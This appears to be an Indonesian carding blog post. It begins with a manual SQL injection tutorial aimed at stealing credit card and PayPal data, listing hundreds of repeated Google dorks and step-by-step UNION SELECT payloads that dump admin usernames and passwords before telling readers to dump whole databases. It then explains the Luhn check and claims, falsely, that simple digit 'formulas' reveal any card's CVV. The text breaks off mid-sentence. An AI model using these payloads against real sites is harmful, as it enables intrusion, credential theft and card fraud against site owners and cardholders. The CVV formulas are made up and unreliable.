Showing posts with label CARDER. Show all posts
Tutorial]cara mencari CC atau akun paypal dengan SQL INJECTION Manual
Hal pertama yang harus sobat lakukan adalah mengetahui apakah situs tersebut terkena celah SQL Injection atau tidak, yaitu dengan membuat sebuah error dengan menambahkan karakter (‘) “tanpa tanda kurung” setelah / sesudah angka pada url
Dork list:
Code:
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=d=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurltray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?av
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurlreview.php?id=
inurl:loadpsb.php?id=
inurlpinions.php?id=
inurl:spr.php?id=
inurlages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurlarticipant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurlrod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurlerson.php?id=
inurlroductinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurlrofile_view.php?id=
inurl:category.php?id=
inurlublications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurlrod_info.php?id=
inurl:shop.php?do=part&id=
inurlroductinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurlroduct.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurlroduit.php?id=
inurlop.php?id=
inurl:shopping.php?id=
inurlroductdetail.php?id=
inurlost.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurlage.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurlroduct_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:tran******.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurlpinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurlffer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inur l: info.php?id=
inurl : pro.php?id=
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurltray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurlreview.php?id=
inurl:loadpsb.php?id=
inurlpinions.php?id=
inurl:spr.php?id=
inurlages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurlarticipant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurlrod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurlerson.php?id=
inurlroductinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurlrofile_view.php?id=
inurl:category.php?id=
inurlublications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurlrod_info.php?id=
inurl:shop.php?do=part&id=
inurlroductinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurlroduct.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurlroduit.php?id=
inurlop.php?id=
inurl:shopping.php?id=
inurlroductdetail.php?id=
inurlost.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurlage.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurlroduct_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:tran******.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurlpinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurlffer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:shop+php?id+site:fr
“inurl:admin.asp”
“inurl:login/admin.asp”
“inurl:admin/login.asp”
“inurl:adminlogin.asp”
“inurl:adminhome.asp”
“inurl:admin_login.asp”
“inurl:administratorlogin.asp”
“inurl:login/administrator.asp”
“inurl:administrator_login.asp”
inurl:”id=” & intext:”Warning: mysql_fetch_assoc()
inurl:”id=” & intext:”Warning: mysql_fetch_array()
inurl:”id=” & intext:”Warning: mysql_num_rows()
inurl:”id=” & intext:”Warning: session_start()
inurl:”id=” & intext:”Warning: getimagesize()
inurl:”id=” & intext:”Warning: is_writable()
inurl:”id=” & intext:”Warning: getimagesize()
inurl:”id=” & intext:”Warning: Unknown()
inurl:”id=” & intext:”Warning: session_start()
inurl:”id=” & intext:”Warning: mysql_result()
inurl:”id=” & intext:”Warning: pg_exec()
inurl:”id=” & intext:”Warning: mysql_result()
inurl:”id=” & intext:”Warning: mysql_num_rows()
inurl:”id=” & intext:”Warning: mysql_query()
inurl:”id=” & intext:”Warning: array_merge()
inurl:”id=” & intext:”Warning: preg_match()
inurl:”id=” & intext:”Warning: ilesize()
inurl:”id=” & intext:”Warning: filesize()
inurl:”id=” & intext:”Warning: require()
inurl:index.php?id=
inurl:trainers.php?id=
inurl:login.asp
index of:/admin/login.asp
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:produit.php?id=+site:fr
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurltray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurlreview.php?id=
inurl:loadpsb.php?id=
inurlpinions.php?id=
inurl:spr.php?id=
inurlages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurlarticipant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurlrod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurlerson.php?id=
inurlroductinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurlrofile_view.php?id=
inurl:category.php?id=
inurlublications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurlrod_info.php?id=
inurl:shop.php?do=part&id=
inurlroductinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurlroduct.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurlroduit.php?id=
inurlop.php?id=
inurl:shopping.php?id=
inurlroductdetail.php?id=
inurlost.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurlage.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurlroduct_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurlpinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurlffer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
Quote:Contoh :
http://impgang dot com/news.php?id=14’
http://impgang dot com/news.php?id=’14
Apabila terlihat pesan error seperti ini :
Quote:You have an error in your SQL syntax.You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”’ at line 1
Maka bisa dipastikan situs tersebut terdapat bug SQL Injection :D
Lalu lanjut lagi menentukan Jumlah Kolom
caranya :
Quote: http://www.site.com/news.php?id=7 order by 1-- || Gak Error
http://www.site.com/news.php?id=7 order by 2-- || Gak Error
http://www.site.com/news.php?id=7 order by 3-- || Gak Error
http://www.site.com/news.php?id=7 order by 4-- || Gak Error
http://www.site.com/news.php?id=7 order by 5-- || Gak Error
http://www.site.com/news.php?id=7 order by 6-- || Gak Error
http://www.site.com/news.php?id=7 order by 7-- || error
Nah kita mengetahui kalau kolom ke 7 itu Error artinya Website hanya memiliki 6 Kolom karena pada kolom nomor 7 sudah tidak ada hubungannya dengan kolom yang lainnya.
Jika kita membuka kolom yang Error maka terlihat seperti ini:
Quote:Unknown column '7' in 'order clause'
Lalu selanjutnya kita gunakan perintah fungsi union untuk menampilkan area kolom yang vuln . Gunakan perintah "Union Select" tanpa tanda petik.
caranya, ganti kata "order by" menjadi "Union Select", lalu setelah "id=" kita tambahkan saja tanda (-) gak pake tanda kurung lalu jika error tepat pada angka yg vuln (contoh angka 7) maka kalian urutkan dari angka 1 sampai 6 karena angka 7 Error.
Terlihat seperti ini:
Quote:Sebelumjika berhasil seharusnya kita bisa melihat area kolom yang vuln.
http://www.site.com/news.php?id=7 order by 6-- (Karena Angka 7 Error Maka di ganti menjadi 6)
Sesudah
http://www.site.com/news.php?id=-7 union select 1,2,3,4,5,6--
maksudnya begini, area kolom yang vuln itu adalah nomor yang barusan kita buat lalu terpampang di website . Jadi begini, kalian sudah mencari vuln dengan urutan 1,2,3,4,5,6 . maka dari urutan 1,2,3,4,5,6 pasti akan terpampang salah satu nomor tersebut di website.
Next setelah itu kita akan mencoba Cek Versi MYSQL yang digunakan
untuk mengetahui versi mysql kita gunakan "@@version" atau "version()" tanpa tanda petik.Dari hasil sebelumnya, sekarang kita gunakan untuk mengecek versi mysql, caranya ikuti langkah berikut. Misalkan kolom yang vuln yang tampil adalah nomor 4 maka ganti saja kolom 4 dengan "@@version" sehingga urlnya menjadi:
Quote:SebelumSekarang kita bisa melihat versinya seperti 5.0.96 atau versi yang lainnya tetapi versi harus memiliki angka 5 didepannya.
http://www.site.com/news.php?id=-7 union select 1,2,3,4,5,6--
Sesudah
http://www.site.com/news.php?id=-7 union select 1,2,3,@@version,5,6--
Sekarang kita melangkah ke tahap selanjutnya yaitu memunculkan nama-nama table yang ada di dalam web tersebut dengan mengganti perintah "@@version" dengan "group_concat(table_name)" dan menambahkan perintah "from information_schema.tables where table_schema=database()" sesudah angka terakhir , sebelum tanda --
Contohnya begini:
Quote:SebelumNah terlihat ada nama table table di site yg kalian praktekkan
http://www.site.com/news.php?id=-7 union select 1,2,3,@@version,5,6--
Sesudah
http://www.site.com/news.php?id=-7 union select 1,2,3,group_concat(table_name),5,6 from information_schema.tables where table_schema=database()--
misalnya terlihat ada table admin, research, vcounter
maka kita akan memproses table admin sehingga kita mendapatkan Username dan Passwordnya, tetapi sayangnya, tidak semua website langsung menampakkan Table admin,tapi kalian bisa cari disatu-satu table yang muncul disite kalian.
Tahap selanjutnya yaitu mengetahui kolom yang ada pada table admin tersebut. Cara mengganti perintah "group_concat(table_name)" dengan perintah "group_concat(column_name)" dan mengganti perintah "information_schema.tables" menjadi "information_schema.columns" juga mengganti perintah "table_schema=database()" dengan perintah "table_name=" lalu menambahkan nama tablenya tapi yg sudah di convert menjadi hex sesudah tanda (=) tanpa tanda kurung dan diawali dengan 0x . Ini website untuk convert Text menjadi Hex
Contohnya begini:
Admin < Ini Text
lalu di convert ke Hex dan tambahkan "0x" diawal maka jadilah
Admin(text) -> 61646d696e(hex) -> 0x61646d696e(table)
nah jadi terlihat link seperti ini:
Quote:Sebelumnah tiba-tiba muncul kolom id,admin_id,admin_pass pada tabel admin tadi.
http://www.site.com/news.php?id=-7 union select 1,2,3,group_concat(table_name),5,6 from information_schema.tables where table_schema=database()--
Contoh Sesudah
http://www.site.com/news.php?id=-7 union select 1,2,3,group_concat(column_name),5,6 from information_schema.columns where table_name=HASIL CONVERT TEXT KE HEX--
Note :HASIL CONVERT TEXT KE HEX yaitu hasil convert dari nama table yang barusan kalian Convert
Sesudah
http://www.site.com/news.php?id=-7 union select 1,2,3,group_concat(column_name),5,6 from information_schema.columns where table_name=0x61646d696e--
Oke selanjutnya cara mengeluarkan data column,caranya cukup gampang
kalian tinggal mengganti "group_concat(column_name)" menjadi "group_concat(admin_id,0x3a,admin_pass)" lalu ganti "information_schema.columns where table_name=CODEHEX--" menjadi "admin"
Question : mengapa saya masukkan admin_id,0x3a,admin_pass dan apa maksud dari 0x3a lalu kenapa "information_schema.columns where table_name=CODEHEX" diganti menjadi "admin"?
Answer : karena admin_id dan admin_pass adalah nama kolom pada tabel Admin yang barusan saya convert ke Hex.
kalau 0x3a itu sebenarnya Code jika kita convert ke hex itu artinya (:) titik dua. saya menggantinya karena perintah itu tidak digunakan lagi karena kita sudah menemukan Tabel dan Kolomnya dan makanya saya hapus Information_schema.columns... dan menggantinya menjadi admin karena kita akan membongkar isi tabel tersebut.
WARNING:JANGAN SAMAKAN NAMA TABEL CONTOH INI DENGAN NAMA TABEL YANG SEDANG ANDA PRAKTEKKAN
Maka terlihat seperti ini:
Quote:SebelumAkhirnya berhasil.. kalian akan mendapatkan username dan password admin diwebsite yang barusan kalian praktekan
http://www.site.com/news.php?id=-7 union select 1,2,3,group_concat(column_name),5,6 from information_schema.columns where table_name=0x61646d696e--
Sesudah
http://www.site.com/news.php?id=-7 union select 1,2,3,group_concat(admin_id,0x3a,admin_pass),5,6 from admin--
contohnya seperti ini:
![[Image: step7.png]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsesJ6KGmuj1mpnPu4MuL6O3ARPOLqCgHJAAxqoV9Z_MpuLUG0_ihVU6jL-gDUzBfPym4DzpidKALN_EsOE8KrVXEdHlWPwsCZEzbanoeluJVnTX4-mL2zjog1BBupF71pUEqqiXvHDE_g/s1600/step7.png)
Setelah itu cari halaman login admin di website setelah itu loginkan username adminnya dan dump semua databasenya
Carding Php
![[Image: Credit-Cards_Merithew.jpg]](http://www.wired.com/images_blogs/threatlevel/2011/10/Credit-Cards_Merithew.jpg)
Pada bagian ini anda akan mengetahui rahasia tersembunyi tentang Kartu Kredit,meliputi : Kode Rahasia CVV (Cardholder VerificationValue) Kode Rahasia CVV (Cardholder Verivication Value)
Setiap Kartu Kredit dilengkapi dengan 3 atau
4 KODE ANGKA RAHASIA, yang sering dikenal sebagai CVV (Cardholder Verification Value). CVV memiliki banyak sebutan lainnya, misalnya : CSC (Card Security Code) atau CVN (Card Verification Number).
• Perusahaan Visa menyebutnya sebagai CVV2, • Mastercard menyebutnya sebagai CVC2, • Diners Club menyebutnya sebagai CVV2, • Perusahaan American Express menyebutnya CIN (Card Identification Number).
Visa dan Mastercard Memiliki 3 digit CVV/ CVC, sedangkan American Express Memiliki 4 digit CIN. Biasanya CVV ini terletak di bagian belakang kartu kredit, yang merupakan nomor otorisasi manual untuk kartu kredit supaya bisa melakukan transaksi. Jika anda biasa belanja di Hypermarket / Supermarket dengan menggunakan Kartu Kredit, coba perhatikan,
biasanya seorang Kasir yang teliti, setelah menggesek Kartu Kredit Anda, dia akan membalik Kartu Kredit Anda untuk mengecek 3 DIGIT CVV Anda yang muncul di layar komputernya. Tapi biasanya jika Kartu Kredit Anda memiliki foto, seorang kasir tidak perlu melihat CVV Anda, tapi dia hanya perlu mencocokkan foto anda di kartu dengan diri anda, jadi jangan heran apalagi Ge-Er apabila seorang kasir yang cantik melirik anda ….. hehehe …. CVV jauh lebih sering digunakan untuk TRANSAKSI yang tidak menggunakan Kartu Kredit secara fisik, tapi Lebih Sering digunakan untuk mengecek pembelanjaan secara Online / Via Internet. Jadi Dengan Adanya CVV ini , maka sang pemilik Kartu Kredit akan merasa amandalam mencegah orang yang tidak diinginkan melakukan transaksi denganmenggunakan Nomor Kartu Kredit miliknya. BENARKAH ? 00 % SALAH !!!! Anda akan mengetahui bagaimana cara
mengetahui Nomer Kode Rahasia CVV dari
kartu kredit manapun juga … !!! Syaratnya
hanya 1, anda harus mengetahui NOMER
KARTU KREDITnya , Tidak Bisa Ditawar-
Tawar … !!! Silahkan dibaca terus… Mengetahui apakah suatu Kartu Kredit Valid
atau Tidak Cara Rahasia Mengetahui apakah suatu
Kartu Kredit Valid atau Tidak. Setiap anda
berbelanja menggunakan Kartu Kredit, maka
ada suatu proses keabsahan suatu Kartu
Kredit yang dikenal dengan nama
Authentifikasi, yaitu suatu proses pengecekan apakah kartu kredit yang anda
gunakan masih Valid Atau Tidak. Biasanya
pengecekan akan lebih mudah dengan
menggunakan mesin atau sistem, tapi
tahukah anda bahwa anda bisa juga
melakukan pengecekan apakah Kartu Kredit yang anda miliki Valid atau tidak ? Lalu
bagaimanakah cara pengecekannya ? Mari
kita simak bersama : Contoh : Misalnya No. Kartu Kreditnya adalah
5378-5432-1011-8224 Saya Ingin
mengetahui apakah nomor Kartu Kredit itu
Valid atau Tidak ? Begini caranya :
Terdapat 16 DIGIT pada Nomer Kartu Kredit
Tersebut. Langkah I, Kalikan SEMUA ANGKA pada DIGIT GANJIL
dengan “2”, lalu : - Jika hasilnya Lebih dari 9 maka KURANGI
HASILNYA dengan “9”,
- Jika hasilnya Kurang dari 9, biarkan saja.
Setelah itu JUMLAHKAN SEMUANYA.
Digit 1 : 5 ; 5×2 = 10 {Lebih dari 9}, jadi 10
– 9 = 1 Digit 3 : 7 ; 7×2 = 14 {Lebih dari 9}, jadi 14
– 9 = 5
Digit 5 : 5 ; 5×2 = 10 {Lebih dari 9}, jadi 10
– 9 = 1
Digit 7 : 3 ; 3×2 = 6 {Biarkan saja, karena
KURANG DARI 9} Digit 9 : 1 ; 1×2 = 2 {Biarkan saja, karena
KURANG DARI 9}
Digit 11 : 1 ; 1×2 = 2 {Biarkan saja, karena
KURANG DARI 9}
Digit 13 : 8 ; 8×2 = 16 {Lebih dari 9}, jadi
16 – 9 = 7} Digit 15 : 2 ; 2×2 = 4 {Biarkan saja, karena
KURANG DARI 9}
Lalu jumlahkan :
1 + 5 + 1 + 6 + 2 + 2 + 7 + 4 = 28 Langkah II, Jumlahkan Digit yang ada di posisi Genap
pada data No. Kartu Kredit
5378-5432-1011-8224 Digit 2 : 3
Digit 4 : 8
Digit 6 : 4
Digit 8 : 2
Digit 10 : 0
Digit 12 : 1 Digit 14 : 2
Digit 16 : 4
————— +
Jumlah : 24 Langkah III, Jumlahkan hasil Langkah I dengan Langkah
II
28 + 24 = 52
Karena 52 TIDAK HABIS DIBAGI dengan
“10” (Masih menyisakan bilangan
desimal yaitu 5,2) , maka KARTU KREDIT ITU TIDAK VALID / TIDAK SAH / TIDAK
DAPAT DIGUNAKAN.
Mudah, bukan ? Cara Mengetahui Nomer Kode Rahasia CVV / CVN / CIN dari Kartu Kredit apapun Nah ini dia yang ditunggu – tunggu, saya akan memberitahu anda cara mengetahui
Nomer Kode Rahasia CVV / CVN /CIN dari Nomer Kartu Kredit jenis Apapun. Mengetahui Nomer Kode Rahasia CVV / CVN / CIN dari KartuKredit apapun Misal saya ambil contoh no. Kartu Kredit :
5378-5432-1011-8224 KETERANGAN : Perlu Anda ketahui bahwa saya hanya mengetikkan 16 digit angka yang asal-asalan saja. Saya tidak mengetahui nama pemilik Kartu Kredit Ini, Tinggalnya dimana, berasal dari Indonesia / Luar Negeri, dan sebagainya. Sekali Lagi, saya hanya asala- salan saja memberi contoh No. Kartu Kredit, karena ini hanyalah sebuah contoh saja.
Kembali ke CONTOH No. Kartu Kredit tersebut :
5378-5432-1011-8224
Cara mengetahui No. CVVnya adalah sebagai berikut : “RUMUS 1” Cari Digit ke 8 : yaitu 2
Cari Digit ke 12 : yaitu 0
Cari Digit ke 3 : yaitu 7 (TAMBAHKAN
DENGAN “1”) , berarti 7 + 1 = 8
Maka ketahuan CVVnya adalah 208 , hehehe
… mudah, bukan ? Atau bisa juga dengan rumus yang kedua : “RUMUS 2” Cari Digit ke 7 : yaitu 3
Cari Digit ke 13 : yaitu 8
Cari Digit ke 3 : yaitu 7 (TAMBAHKAN
DENGAN “1”) , berarti 7 + 1 = 8
Maka ketahuan CVVnya adalah 388 , hehehe
mudah, bukan ? Atau bisa juga dengan rumus yang ketiga : “RUMUS 3” Cari Digit ke 9 : yaitu 1
Cari Digit ke 3 : yaitu 7
Cari Digit ke 6 : yaitu 4 (TAMBAHKAN DENGAN “1”) , berarti 4 + 1 = 5
Maka ketahuan CVVnya adalah 175 , hehehe … mudah, bukan ?
Silahkan anda coba sendiri menggunakan KARTU KREDIT ANDA, kebetulan setelah saya iseng-iseng mencoba RUMUS 1, 2 dan 3 dengan menggunakan NOMER KARTU KREDIT yang saya miliki, ternyata CVV Kartu Kredit yang saya miliki
